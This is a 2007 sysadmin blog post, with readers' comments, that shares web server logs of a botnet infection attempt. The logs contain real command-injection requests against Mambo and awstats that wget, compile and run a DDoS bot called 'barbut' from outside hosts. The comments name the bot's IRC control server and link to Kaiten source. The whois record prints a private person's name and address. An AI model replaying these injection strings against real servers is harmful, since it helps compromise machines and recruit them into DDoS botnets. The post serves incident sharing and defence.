huanix

chown -R huanix /

huanix header image 2
Connecting to MySQL 5.0.xx from a remote client on Ubuntu Gutsy (or other) It’s the RAM, you fool! OR, “why you should always run memtest”

GET request for barbut.c or barbut from http://crekom.com

November 21st, 2007 · 6 Comments

I wanted to share this interesting hit from my apache2 error log:

[Tue Nov 20 17:49:49 2007] [error] [client 200.253.204.130] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1

[Tue Nov 20 17:49:50 2007] [error] [client 200.253.204.130] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 17:49:52 2007] [error] [client 200.253.204.130] script ‘/var/www/login/index2.php’ not found or unable to stat

[Tue Nov 20 17:49:53 2007] [error] [client 200.253.204.130] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1

[Tue Nov 20 17:49:54 2007] [error] [client 200.253.204.130] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1

Here is the whois for crekom.com:

domain: crekom.com
status: ACTIVE
owner-c: LULU-326746
admin-c: LULU-326746
tech-c: LULU-326746
zone-c: LULU-326746
nserver: NS5.NAMESERVERSERVICE.DE
nserver: NS6.NAMESERVERSERVICE.DE
created: 2003-12-24 07:10:27
expire: 2007-12-24 00:00:00 (registry time)
changed: 2006-12-26 02:51:47

[owner-c] handle: 326746
[owner-c] type: PERSON
[owner-c] title:
[owner-c] fname: Wolfgang
[owner-c] lname: Cremer
[owner-c] org: Crekom GmbH
[owner-c] address: Blumenrather Strasse 70
[owner-c] city: Alsdorf
[owner-c] pcode: 52477
[owner-c] country: DE
[owner-c] state: Nordrhein-Westfalen

I have not been able to get an active link to the c code, but if you find it, I’d appreciate it if you could post it in a comment.

Update: FWIW, I am pretty sure that this fellow used a port scan on port 80, and didn’t access any domain names. The entry in my log file is associated with my IP, not with any domain.

The script apparently failed, but according to one of the submitted comments, but jt commented and was able to get the the uncompiled c before it disappeared from the host server. jt’s comment described the source code:

the DDoS bot connects to the ircserver at 217.79.190.56, Joins channel #pulamea with key bleh. All of the DDoS bots seems to have faked ident responses set as follows:
#define FAKENAME “-bash” // What you want this to hide as

Links:

Kaiten source:http://packetstormsecurity.nl/irc/kaiten.c
Sophos warning: http://www.sophos.com/security/analyses/trojkaitenw.html

Please continue to share your observations…

Tags: Uncategorized

6 responses so far ↓

  • 1 jt // Nov 21, 2007 at 8:52 am

    This attempted to access my home cable server as well. He looks to be coming from both 217.128.160.150 and 62.105.180.178. He also attempts to get the DDoS program from the following IP address:

    Compiled Version: http://85.114.128.21/barbut
    UnCompiled Version: http://85.114.128.21/barbut.c

    I have the uncompiled version of this now, and the innards look as follows:

    the DDoS bot connects to the ircserver at 217.79.190.56, Joins channel #pulamea with key bleh. All of the DDoS bots seems to have faked ident responses set as follows:
    #define FAKENAME “-bash” // What you want this to hide as

  • 2 Dark // Nov 21, 2007 at 6:21 pm

    Hey man, I have the exact same guy I think

    71.179.181.241 - - [21/Nov/2007:19:21:37 +0100] “GET /?mosmsg=Incorrect%20Username,%20Password,%20or%20Access%20Level.%20Please%20try%20again HTTP/1.1″ 200 246
    71.179.181.241 - - [21/Nov/2007:19:21:37 +0100] “GET /favicon.ico HTTP/1.1″ 404 289
    81.82.2.73 - - [21/Nov/2007:21:31:04 +0100] “GET / HTTP/1.1″ 200 246
    81.82.2.73 - - [21/Nov/2007:21:31:23 +0100] “GET / HTTP/1.1″ 304 -
    62.105.180.178 - - [21/Nov/2007:23:02:47 +0100] “GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.
    gif HTTP/1.1″ 404 287
    62.105.180.178 - - [21/Nov/2007:23:02:48 +0100] “GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbu
    t ; HTTP/1.1″ 400 371
    62.105.180.178 - - [21/Nov/2007:23:02:50 +0100] “GET rm -f barbut barbut.c HTTP/1.1″ 400 371
    62.105.180.178 - - [21/Nov/2007:23:02:51 +0100] “GET /mambo//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.c
    om/ HTTP/1.1″ 404 294
    62.105.180.178 - - [21/Nov/2007:23:02:52 +0100] “GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;
    ./b HTTP/1.1″ 400 371
    62.105.180.178 - - [21/Nov/2007:23:02:53 +0100] “GET arbut ;rm -f barbut barbut.c HTTP/1.1″ 400 371
    62.105.180.178 - - [21/Nov/2007:23:02:57 +0100] “GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd
    .gi HTTP/1.1″ 404 288
    62.105.180.178 - - [21/Nov/2007:23:02:58 +0100] “GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barb
    ut HTTP/1.1″ 400 371
    62.105.180.178 - - [21/Nov/2007:23:03:00 +0100] “GET ;rm -f barbut barbut.c HTTP/1.1″ 400 371

    That’s my log. Same 62.105.180.178 ip. Seems like a scriptkiddy to me. Doesn’t know what he’s doing. He’s attacking an OpenBSD server here using a script (see the timestamps).

  • 3 Magnus // Nov 22, 2007 at 4:01 am

    I also got the probe:

    Wed Nov 21 04:24:49 2007] [error] [client 190.54.35.179] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
    [Wed Nov 21 04:24:50 2007] [error] [client 190.54.35.179] File does not exist: /var/www/html/gr8.nu/mambo
    [Wed Nov 21 04:24:51 2007] [error] [client 190.54.35.179] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
    [Wed Nov 21 04:24:52 2007] [error] [client 190.54.35.179] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
    [Wed Nov 21 04:24:54 2007] [error] [client 190.54.35.179] script ‘/var/www/html/gr8.nu/index2.php’ not found or unable to stat
    [Wed Nov 21 04:24:55 2007] [error] [client 190.54.35.179] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
    [Wed Nov 21 04:24:56 2007] [error] [client 190.54.35.179] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1

  • 4 plook // Nov 25, 2007 at 12:37 pm

    Same here, coming from IP: 200.253.204.130

    [Tue Nov 20 14:20:05 2007] [error] [client 200.253.204.130] script ‘/var/www/domain.com/index.php’ not found or unable to stat
    [Tue Nov 20 14:20:08 2007] [error] [client 200.253.204.130] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
    [Tue Nov 20 14:20:09 2007] [error] [client 200.253.204.130] File does not exist: /var/www/domain.com/mambo
    [Tue Nov 20 14:20:10 2007] [error] [client 200.253.204.130] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
    [Tue Nov 20 14:20:11 2007] [error] [client 200.253.204.130] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
    [Tue Nov 20 14:20:13 2007] [error] [client 200.253.204.130] script ‘/var/www/domain.com/index2.php’ not found or unable to stat
    [Tue Nov 20 14:20:14 2007] [error] [client 200.253.204.130] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
    [Tue Nov 20 14:20:15 2007] [error] [client 200.253.204.130] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1

  • 5 Marvy // Nov 25, 2007 at 5:21 pm

    This guy has run up $6000 worth of traffic on one of our servers. I have a copy of the barbut.c code if need it.

  • 6 Dandrake // Dec 13, 2007 at 3:37 am

    Same here:
    66.236.209.227 - - [19/Nov/2007:04:51:42 +0200] “GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1″ 404 299
    66.236.209.227 - - [19/Nov/2007:04:51:43 +0200] “GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1″ 404 291
    66.236.209.227 - - [19/Nov/2007:04:51:44 +0200] “GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1″ 404 299
    66.236.209.227 - - [19/Nov/2007:04:51:45 +0200] “GET /cgi-bin/awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1″ 404 307
    62.105.180.178 - - [19/Nov/2007:21:09:30 +0200] “GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1″ 400 374
    62.105.180.178 - - [19/Nov/2007:21:09:32 +0200] “GET rm -f barbut barbut.c HTTP/1.1″ 400 374
    62.105.180.178 - - [19/Nov/2007:21:09:38 +0200] “GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1″ 400 374
    62.105.180.178 - - [19/Nov/2007:21:09:42 +0200] “GET arbut ;rm -f barbut barbut.c HTTP/1.1″ 400 374
    62.105.180.178 - - [19/Nov/2007:21:09:44 +0200] “GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1″ 400 374
    62.105.180.178 - - [19/Nov/2007:21:09:45 +0200] “GET ;rm -f barbut barbut.c HTTP/1.1″ 400 374

Leave a Comment